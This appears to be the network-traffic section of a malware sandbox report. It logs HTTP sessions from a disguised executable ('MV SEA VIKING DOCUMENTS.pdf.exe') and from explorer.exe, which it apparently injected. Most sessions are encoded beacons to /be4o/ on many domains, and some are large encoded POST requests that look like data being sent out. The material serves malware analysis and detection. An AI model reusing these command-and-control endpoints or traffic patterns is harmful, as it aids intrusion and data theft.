                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.11.20 | 49793 | 35.214.4.70 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:52:44.394613981 CET | 8997 | OUT | GET /be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.ooo-club.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
Feb 21, 2022 16:52:44.419480085 CET | 8998 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:52:44 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: https://www.ooo-club.com/be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0
                                                                                                                                                                                                                              Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                              X-HTTPS-Enforce: 1
                                                                                                                                                                                                                              X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.11.20 | 49795 | 35.244.144.199 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:53:08.784050941 CET | 9005 | OUT | GET /be4o/?h48Hl=iu9SHmJYjlqHSITYxUYF5zd8ZPof8OreVpr1w+DDUlIuWCBWIgIZulFzL5qHxGUDcYYs&w6=ZbFDmL HTTP/1.1
                                                                                                                                                                                                                              Host: www.4huav946.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
Feb 21, 2022 16:53:09.078499079 CET | 9007 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                              Server: nginx/1.14.0
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:53:08 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 5379
                                                                                                                                                                                                                              Last-Modified: Fri, 30 Apr 2021 06:44:28 GMT
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              ETag: "608ba74c-1503"
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.25.1",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("script")[0];o.parentNode.insertBefore(e,o)}function baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,
Feb 21, 2022 16:53:09.078566074 CET | 9008 | IN |
Data Raw: 65 2c 6f 5d 29 7d 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e5 8a a0 e8 bd bd e7 99 be e5 ba a6 e7 bb 9f e8 ae a1 e8 84 9a e6 9c ac 2e 2e 2e 22 29 2c 77 69 6e 64 6f 77 2e 5f 68 6d 74 3d 77 69 6e 64 6f 77 2e 5f 68 6d 74 7c 7c 5b 5d 3b 63 6f 6e 73 74
                                                                                                                                                                                                                              Data Ascii: e,o])}console.log("..."),window._hmt=window._hmt||[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc";loadBaiduHmt(token)</script><script>function send(n){(new Image).src=n}function reportLoading(n){n=n|
Feb 21, 2022 16:53:09.078614950 CET | 9010 | IN |
Data Raw: 6c 61 63 65 28 2f 25 32 30 2f 67 2c 22 2b 22 29 2c 73 3d 22 22 2e 63 6f 6e 63 61 74 28 22 68 74 74 70 73 3a 2f 2f 74 72 61 63 6b 2e 75 63 2e 63 6e 2f 63 6f 6c 6c 65 63 74 22 2c 22 3f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 26 22 29 2e 63 6f 6e 63
                                                                                                                                                                                                                              Data Ascii: lace(/%20/g,"+"),s="".concat("https://track.uc.cn/collect","?").concat(c,"&").concat("uc_param_str=dsfrpfvedncpssntnwbipreimeutsv");(o()||a())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android"
Feb 21, 2022 16:53:09.078649044 CET | 9010 | IN |
Data Raw: 72 63 68 7c 7c 22 3f 22 29 2e 73 75 62 73 74 72 69 6e 67 28 31 29 2e 73 70 6c 69 74 28 22 26 22 29 2c 6c 65 6e 3d 71 73 4c 69 73 74 2e 6c 65 6e 67 74 68 2c 69 3d 30 3b 69 3c 6c 65 6e 3b 69 2b 2b 29 7b 76 61 72 20 65 3d 71 73 4c 69 73 74 5b 69 5d
                                                                                                                                                                                                                              Data Ascii: rch||"?").substring(1).split("&"),len=qsList.length,i=0;i<len;i++){var e=qsList[i];if("debug=t


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.11.20 | 49796 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:53:14.091465950 CET | 9010 | OUT | GET /be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&w6=ZbFDmL HTTP/1.1
                                                                                                                                                                                                                              Host: www.josiemaran-supernatural.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:53:14.197622061 CET9011INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:53:14 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 275
                                                                                                                                                                                                                              ETag: "61ffb800-113"
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
17 | 192.168.11.20 | 49798 | 162.0.209.21 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:53:24.591715097 CET | 9018 | OUT | GET /be4o/?h48Hl=a9faHC2D7Dm/r4BU9fdxzX5Q1U3tWnFtWGXmSrkj2WSz2Xwsoc22xGDcB1dwRLNeK4a1&w6=ZbFDmL HTTP/1.1
Host: www.itservon.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 21, 2022 16:53:24.751013041 CET | 9019 | IN | HTTP/1.1 301 Moved Permanently
keep-alive: timeout=5, max=100
content-type: text/html
content-length: 707
date: Mon, 21 Feb 2022 15:53:24 GMT
server: LiteSpeed
location: https://www.itservon.com/be4o/?h48Hl=a9faHC2D7Dm/r4BU9fdxzX5Q1U3tWnFtWGXmSrkj2WSz2Xwsoc22xGDcB1dwRLNeK4a1&w6=ZbFDmL
x-turbo-charged-by: LiteSpeed
connection: close
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
18 | 192.168.11.20 | 49799 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:53:29.954879999 CET | 9020 | OUT | GET /be4o/?h48Hl=i0+Fnnt4E2duUPt43OZuwY3vuaej64lfKZi0K7F4B5AoqOaU2cNQP6t/zkb03XoiZyP6&w6=ZbFDmL HTTP/1.1
Host: www.fairytalepageants.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 21, 2022 16:53:30.061605930 CET | 9021 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Mon, 21 Feb 2022 15:53:30 GMT
Content-Type: text/html
Content-Length: 275
ETag: "61ffb800-113"
Via: 1.1 google
Connection: close
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
19 | 192.168.11.20 | 49800 | 66.29.154.157 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:53:35.418968916 CET | 9022 | OUT | GET /be4o/?h48Hl=CBV85lUl5iGXXllmWETcgzTRYTuU0jkLI/xLLa4RVPF6HDjlZoPpCKC/374THXhEpvSN&GXqXh=YZ_XN0 HTTP/1.1
Host: www.buresdx.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 21, 2022 16:53:35.679471016 CET | 9022 | IN | HTTP/1.1 404 Not Found
Date: Mon, 21 Feb 2022 15:53:35 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 277
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.buresdx.com Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.11.20 | 49807 | 142.250.185.174 | 443 | C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
20 | 192.168.11.20 | 49803 | 213.190.6.63 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:54:00.654201984 CET | 9041 | OUT | POST /be4o/ HTTP/1.1
Host: www.vendasdigitaisonline.com
Connection: close
Content-Length: 174831
Cache-Control: no-cache
Origin: http://www.vendasdigitaisonline.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.vendasdigitaisonline.com/be4o/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
u6XKzBE0aCNOuwOArr2zDlwzX4A0WxQqd24YAXs1M0YgZ1gfYnfCLe(mKuBVBHCil_Xv0Y0iKBSSnt(xI46jU29-4oMhMOvGxnU6Lw0H1I(0luig(iJHfngv7a8gNc(iV8gvtvEX3q7-7ISPFTqlPyyUlaJNzDw9RVEmGZYVK_xdFVpHa6LJ0wawpwx1up75V8MKgT7edYEBQhGXPn952p(cah7qBhZJSYutPCC4NffsVXWix6Fej25N35BNBeHd3yJI4SjSbC~F(XKfB5v5OL3QRiJV4prIubmVyRZq8FGu2gugH9ruNaLF0Eew4_JgVgBM~UshPnJ1NxdgEU9hWlKOa2L8Re1ppqi4NO9VGQz0YNqWtrfZ0GT-Z-TcyPyLOXJXb-juYyG4ImHT0i2uLrT-afv2BB3V1XiHjE6yBHeM6AgxRJdK0STfwSov6WRdaCh8gD~l1TK9xUj4YImi~OgXgha-JQOYbVpjddTqGcLDU6JgQosy2BfekbdmEVRfMU~UIf0sj7Nbs3tQ1fh_e7KR2T73BAuClNJAWmzObO4iveNlcIzLviKTE8RPsreethFEE056kz52Z0yretEMlVUDNjJj61CuxqTRrl6_PEtK9pq3wytwynM6CbvFmjF3IpjHfeAYY4cONjf3D0y8616BTUhHFVCfI2LezqIb9JTIYv88Bn1hXYLKM8RcwPY_2L3MBNhJcxM0Frz4zdxHSROVg971xdZHr_v0kSTWKWJNqWMh(DJhII5LxK8czvzqSALyEl2NY_IRCYzJ943RUwkyNV(O2QynZ0y3xuSCnjO9VOMrULB_JnfXug8k4UWD759BhUncvRENGlQYzrXnXgSntnl8boFMPNZq9dXH02uMI8SBxSwsefaER9Q9j4qkcxYNBI8PxZD6oQjqceKG~dpc8cEnzZoJcOWlqJ~ixFL1Fv3ZPbTdPDDkSvZ2SabeAyih2_zaTQHGn6vyoinwsNpEyrxgDevLb6f59ncc6qr9HbyeQmfqSJ4rPoa0FYLuhF7_VyIIiitpKyWt9HzfwVeYZbSJY3VA9CntjWOOSXMFi_c2GJjVPonG8qPCvNPAjepOLZu7(tjw2MTxzp~eU1q57L5Q7OqM(bdKH491c7sItLKLkNDiHBkNEarEql3q8cbxfsxjEs1FDgmvNIvEIXWTiRTG06Fp9f8Ao1oFUJQnIDBjrfqiRaAJJMH0ILNoHgMyiyUWAhALmCoUoY4aI_C5pT~Rr4wnktoPQce6oZBrHwjNu1kUTHSkcnBOtO7uDfvGLjg0supmDRIcw1xjCUVlBGkoDw5VyD12GT6abobzTVxmok0t785leSXvf3sdaqB33AKMeC8KlffFHF5VAUNlGptyv_WikZm87Ecasjeemi(fSBInc8lOa5o95zCtx2JvDDSU9TE6jyjO1LPjHAknma8Bo0OSbdcZR33R9xnJb-PpjmROy3SLKsVaS4ia6tAdz4FRf-C0OCd7qrO30SZXm2j3dwsPLZ7F09ffqYEodlb_~wljeETvUlKZX1zRopQ36AQnpUJwp-oHOc3vMtmpjupAFFMw6VI7BjHGFzbR6HF5Ac4z8k4J4cv8iYWdnf4C(hl9rW9eyXFYc8D28KrnwKQA2Ee1g8eu(qDpcoAp7wuSOl~rV7LZc8hA8GWqsz2AjNQdyXUu(AA9234z9M3Pm9ii5kSOdnn_iCItQ_Mr(RtiZpxUD1qCVXIrj40piG4LRCn6BfMicCTLPHCf7nxj2H9Za_zQiQXZkEzf4clq7JlplGNQGgYGrymFhOApPJlnqc1EVl6g5Gg8gxDR5fk-dzY6~V9GLVSVfslxcDwbtmbqIn8IikGXbKmeHFPakTcqWxvuA3qA5WEvJ7jGzpkcXhV_b1dIGT6XkQ30(2bvw1F-9nkRP1migEQMY6ThQ6~xnalOjhoTu42E3fK-xwzy4Guo96DavoU02HYcUywxiBLi2NIZqN(gI-p5LbPxmYaWl_PtS3NS7MTK
Px3jzH6ySnIwg1Q_FqW9aYEs6iFeq9eeyu7_yMkUcV8wGweNYcgM6uECZ4qbNqwDK2R-bWMjNwHLI34U5Nj67-wtsE3EyoHF6x0bU919Lo20WSQP~b9Af_hOG6t52DwYenXrYIucx7cGCLsHB2jTVwaDepBHnn5hcMSNzOFW7Ayipcf_ygPsG2gRhSVJ~Cgn~tu0VoDKQ-~bhkko0OCZvHdlZHekWJ23R5Kx8pdUlJO46Dz_5tCm6gcemKV3K0TtEAbnfWmz7nTp(DIwtq35YNFB3A0Zk-AvpnBUQamyHDR8qOQQkZ7iXb6aC7b6OWqt
                                                                                                                                                                                                                              Feb 21, 2022 16:54:00.654282093 CET9049OUTData Raw: 31 69 62 59 69 48 30 6b 65 35 77 63 50 7a 5f 64 48 69 35 63 71 44 77 64 48 5a 57 30 6f 5a 42 62 70 73 76 62 53 58 48 5a 32 4b 43 57 38 6a 70 4f 72 38 7a 73 61 6d 4e 7a 32 74 52 74 4c 73 64 6e 7a 4d 6f 44 34 48 74 79 65 41 58 37 35 67 6c 6c 6b 54
                                                                                                                                                                                                                              Data Ascii: 1ibYiH0ke5wcPz_dHi5cqDwdHZW0oZBbpsvbSXHZ2KCW8jpOr8zsamNz2tRtLsdnzMoD4HtyeAX75gllkT1pQSYoAsXk139lYgxpQC4Tg74T0noiqznMi0RFPZP2oxM1v7nqebaz6hlZgn19RLQmMvxe1fxmThSu9qmHZmkjOc5Z6Di~Wp8PyLsso1-v82VXPiU(Hq1o6BQTfit0xEOUB9pYpcznJif5sFSYYblPvKHy6ETCFKa
                                                                                                                                                                                                                              Feb 21, 2022 16:54:00.768825054 CET9055OUTData Raw: 79 70 6c 7e 4c 30 56 4e 45 49 55 67 53 42 46 55 4a 32 52 38 46 58 4a 4a 58 42 4a 6f 4e 34 63 76 35 62 48 37 49 6b 5a 57 4d 39 65 6b 31 32 76 78 2d 6e 77 6a 33 47 30 59 36 7a 6c 65 67 4a 2d 56 39 50 36 75 6a 46 42 53 59 50 38 79 30 31 4f 49 44 54
                                                                                                                                                                                                                              Data Ascii: ypl~L0VNEIUgSBFUJ2R8FXJJXBJoN4cv5bH7IkZWM9ek12vx-nwj3G0Y6zlegJ-V9P6ujFBSYP8y01OIDTP1B810v4qehwL5vie8sMVUJujpj99GMTpSPHZaoo_UeEeW3S_FFRP5ajnUbPzYVHKbJk0dg2-2i(bPL3RdbcnM52bWR5WGsinbTsCh3Gga_Mexw4L9lpaLxMj5IGggGz4sRyQB9c1nqtRSLalBnH9Ej84GPZtOLwT
Feb 21, 2022 16:54:00.768925905 CET | 9056 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                              content-length: 707
                                                                                                                                                                                                                              date: Mon, 21 Feb 2022 15:54:00 GMT
                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                              location: https://www.vendasdigitaisonline.com/be4o/
                                                                                                                                                                                                                              content-security-policy: upgrade-insecure-requests
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
21 | 192.168.11.20 | 49804 | 213.190.6.63 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:54:00.771672010 CET | 9062 | OUT | GET /be4o/?h48Hl=7cKzimu7mUkgDRyMKljMoWyo6u+mjltrVmMX1NSvq0diecWuw4+QXmAspWvQrjbM5ify&w6=ZbFDmL HTTP/1.1
                                                                                                                                                                                                                              Host: www.vendasdigitaisonline.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
Feb 21, 2022 16:54:00.888521910 CET | 9063 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                              content-length: 707
                                                                                                                                                                                                                              date: Mon, 21 Feb 2022 15:54:00 GMT
                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                              location: https://www.vendasdigitaisonline.com/be4o/?h48Hl=7cKzimu7mUkgDRyMKljMoWyo6u+mjltrVmMX1NSvq0diecWuw4+QXmAspWvQrjbM5ify&w6=ZbFDmL
                                                                                                                                                                                                                              content-security-policy: upgrade-insecure-requests
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
22 | 192.168.11.20 | 49805 | 38.143.0.82 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:54:06.067137003 CET | 9066 | OUT | POST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.quanqiu55555.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.quanqiu55555.com
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.quanqiu55555.com/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              Data Ascii: 2fZDoNwzATDBr0vMhmGJIJGHT5G1lJpWqUur5W79bh4Ri543SSb3noh5Z5FXFY7~mnHA28HHKo9XIchBVuCNwzWi4scIqTKMAFnXCBCcvudENkWAGby4cNwai3w~xE3BgDaKxYelnb_VSOXKEiYss5-WPejPWSewvbGwO57NUwJ38xqwNjVsshsY5mX3wZZcc1Ska4XA2fD3wuXGyJu8Ewtq-piOnvPc3mLdxvNgUgw8gVdQEWU
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.233232021 CET9088OUTData Raw: 32 28 59 41 77 76 66 58 4f 42 5f 76 4f 45 43 30 6f 7e 62 4e 31 4a 71 31 33 44 70 57 66 67 38 33 57 4d 52 68 70 57 6c 55 7a 75 6d 37 65 6d 79 74 4b 66 48 38 71 64 63 58 4b 65 31 36 75 43 4b 35 38 54 37 46 48 49 51 7e 62 48 4b 28 4d 35 61 31 4d 44
                                                                                                                                                                                                                              Data Ascii: 2(YAwvfXOB_vOEC0o~bN1Jq13DpWfg83WMRhpWlUzum7emytKfH8qdcXKe16uCK58T7FHIQ~bHK(M5a1MDEgbSklO2vk8Hee7tr6I1JROF1dwY56rGCxoxvLYuzXcr18v5rYfplinfURrxsbXyU3kMTg-Se2QSb2l6enic2bz0FheZ2qbGfHiijPOiudJdBYFGK0OF_OtP5IES1wlfeR4TQ~6M5luzPyWj8TtEZZNH6wkCpnoet
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.233577967 CET9096OUTData Raw: 69 52 68 77 58 72 58 79 67 64 79 4a 59 4a 44 6f 6f 4b 56 73 64 7a 54 68 6c 4b 7a 4a 36 63 54 68 36 30 4f 6d 72 45 47 4f 69 6e 5a 74 6c 59 4e 59 6c 64 6c 52 56 32 69 44 45 70 6c 6f 32 38 4b 5a 31 37 68 65 39 41 63 56 64 30 69 57 64 7a 49 6e 4d 72
                                                                                                                                                                                                                              Data Ascii: iRhwXrXygdyJYJDooKVsdzThlKzJ6cTh60OmrEGOinZtlYNYldlRV2iDEplo28KZ17he9AcVd0iWdzInMrAVQ~WrXYDUyptDMhjSCEh4SCB8SJ77pA3pWSuALfZoN98UFv7Tb8C3XRv5BiTCS3uuvKbWyP9rFp5wjxfYN~W~a44k16SpDhfpkmYCPNpR1Tp01UjrqIRoZZqidDGnhkUSMkw0Z9I7rDUFOreF6nmXcNaexSAQBAP
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.233733892 CET9101OUTData Raw: 4c 38 79 6f 61 28 6b 45 47 65 42 68 63 6d 5f 54 6d 45 48 4f 46 4c 4f 53 6e 35 75 77 4a 79 30 64 31 71 53 33 73 56 4e 44 76 59 44 48 44 7a 59 46 73 44 32 79 6c 6d 47 5a 70 78 4b 41 49 4b 41 41 72 39 63 79 63 48 35 78 4f 38 66 33 56 5a 77 50 38 7e
                                                                                                                                                                                                                              Data Ascii: L8yoa(kEGeBhcm_TmEHOFLOSn5uwJy0d1qS3sVNDvYDHDzYFsD2ylmGZpxKAIKAAr9cycH5xO8f3VZwP8~2yzbkc2oDY0afexHR2bX1czXQo7gVqwegR5jrsNxAwgbKVvfibs9bianXnELUVr3aj_2uWsIblvYwWbDriDG1gaZx6mbnO4hKeYn_3-nVJfeAplkpOKbvylhCMQGyXueDn8Ajm0LyTxe5MnN1cTb6oT2_uJiG7kJN
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.233879089 CET9104OUTData Raw: 51 6f 51 46 79 35 4a 65 6f 7e 63 4b 33 73 6d 64 36 39 58 41 41 39 4a 63 56 66 4d 76 58 44 78 4f 33 73 59 4e 5f 58 61 6c 59 55 74 54 5a 4f 78 71 47 41 35 4e 53 4d 5a 72 47 6f 63 6d 64 54 66 52 5a 67 6d 65 53 35 56 67 63 55 4e 57 6f 69 43 4c 42 4a
                                                                                                                                                                                                                              Data Ascii: QoQFy5Jeo~cK3smd69XAA9JcVfMvXDxO3sYN_XalYUtTZOxqGA5NSMZrGocmdTfRZgmeS5VgcUNWoiCLBJW4ThBin1t3JSBy89fTasJlNiptsrh(pOEGC3hJmLST9DBGJ7uJ0Rih7qZB7U-l_bkIBXbdP5b9vGk60thQxEvlkg1i-MmcixcyyuxiH9KByI0yuu7doV042QhWjlJ6NL1w7vwoeeXpnIhXK74jKtOApB2p01b886W
Feb 21, 2022 16:54:06.234543085 CET    9104    IN    HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 21 Feb 2022 15:54:06 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.quanqiu55555.com/be4o/
Strict-Transport-Security: max-age=31536000
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID    Source IP        Source Port    Destination IP    Destination Port    Process
23            192.168.11.20    49806          38.143.0.82       80                  C:\Windows\explorer.exe

Timestamp    kBytes transferred    Direction    Data
Feb 21, 2022 16:54:06.225878000 CET    9077    OUT    GET /be4o/?h48Hl=yMGLhnyeH19jbN+jTVkumEksJ3u99HITZ4h1J3SKUgKf5+hZ4WRN7xEsij25EKwk4NjG&w6=ZbFDmL HTTP/1.1
Host: www.quanqiu55555.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 21, 2022 16:54:06.384147882 CET    9105    IN    HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 21 Feb 2022 15:54:06 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.quanqiu55555.com/be4o/?h48Hl=yMGLhnyeH19jbN+jTVkumEksJ3u99HITZ4h1J3SKUgKf5+hZ4WRN7xEsij25EKwk4NjG&w6=ZbFDmL
Strict-Transport-Security: max-age=31536000
